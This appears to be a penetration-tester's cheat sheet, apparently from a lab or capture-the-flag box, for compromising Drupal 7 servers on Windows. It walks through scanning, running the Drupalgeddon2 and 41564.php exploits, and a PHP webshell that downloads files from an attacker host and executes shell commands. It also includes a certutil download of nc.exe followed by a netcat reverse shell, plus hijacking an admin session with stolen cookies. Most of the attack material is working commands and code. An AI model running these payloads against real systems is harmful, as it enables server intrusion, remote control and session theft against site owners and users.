# Drupal

* [https://www.drupal.org](https://www.drupal.org/)
* Open-source web content management framework written in PHP

## Scan

```
nmap -sC -sV -oA output 10.x.x.x

80     IIS 7.5 drupal = Windows 2008 R2
135    rpc
49154  rpc
 
DirBuster found 'rest': /rest/ — 200

http://10.x.x.x  ..drupal
```

## drupscan

* Works but too old - last updated like 2013
* github/tibillys

## droopescan

* Takes a long time to run
* [http://$IP/CHANGELOG.txt](http://$ip/CHANGELOG.txt) ..Find Version
* http\://$IP/robots.txt

```
droopescan --help
droopescan scan drupal -u 10.x.x.x

version: 7.54        ..Interesting Results
Admin: Login page    ..But no exploits
Theme: seven
ctools, libraries,
image module
```

## drupalgeddon (msf)

```
searchsploit drupal 7.5
```

## drupalgeddon (no msf)

* CVE-2018-7600
* <https://github.com/dreadlocked/Drupalgeddon2>
* If you get a 'limited shell' you will need to upload nc.exe and do reverse shell

```
gem install highline
ruby drupalgeddon2.rb 10.x.x.x

nc -nvlp 4444
certutil -urlcache -split -f http://$MyIP/nc.exe
nc.exe -e cmd.exe $MyIP 4444
```

## Serialization Vulnerability - 41564.php

* Search and Download the php exploit
* ippsec includes Custom phpCode for:
  * Uploading and Execution
  * Requires php-curl
* Exploit will download json files that could have secrets

```
google drupal 7.54 exploits  ..found one
searchsploit drupal          ..found 7.x
searchsploit -x 41564.php    ..view
searchsploit -p 41564.php    ..clipboard
mv 41564.php drupal.php      ..move/rename

Confirm rest:
http://10.x.x.x/rest_endpoint  ..nothing
http://10.x.x.x/rest           ..ok
```

```
$url = 'http://10.x.x.x/'
$endpoint_path = '/rest_endpoint'    ..default/wrong
$endpoint_path = '/rest';            ..found by dirbuster

$phpCode = <<<'EOD'
<?php
 if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload], file_get_contents("http://10.x.x.x:8000/" . $_REQUEST['fupload']));
 };
 if (isset($_REQUEST['fexec'])) {
  echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
 };
?>
EOD;

$file= [
        'filename' => 'ippsec.php',
        'data' => $phpCode
];
```

```
Exploit:
> php drupal.php
```

## Json Cookies

* Exploit will save json files locally
* Check them for details, and session cookies to steal
* Create a New Cookie, and you might get Admin

```
cat user.json      ..user/pass
cat session.json   ..session/admin/cookie

firefox > cookies manager+ (addon) > New Cookie
cat session.json
session_name = Name: xyz111
session_id   = Content: ddddd
<save>
http://10.x.x.x/   ..we are admin!!
```

## Dupal PHP Module

* If you can access Drupal:
  * Enable the PHP Filter
  * Create an Article that has PHP

```
Drupal > Modules > PHP Filter (enable) > save
Add Content > Create Article
Title: test
Body: <?php phpinfo(); ?>
Format: PHP Code
Preview ... we have code execution!
```

## Webshell

* Use the ippsec phpCode
* Execute commands and upload

```
http://10.x.x.x/ippsec.php?fexec=dir
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=sc query state=all   ..denied
```

## Enumeration

* **systeminfo** will tell us the OS version and Patch level
* Hotfix 'N/A' might mean we dont have access, or there are no patches
* OS/Patch level will help us with KernelExploit

```
OS Ver: 6.1.7600 B/A Build 7600
Hotfix: N/A
Kernel Exploit 
```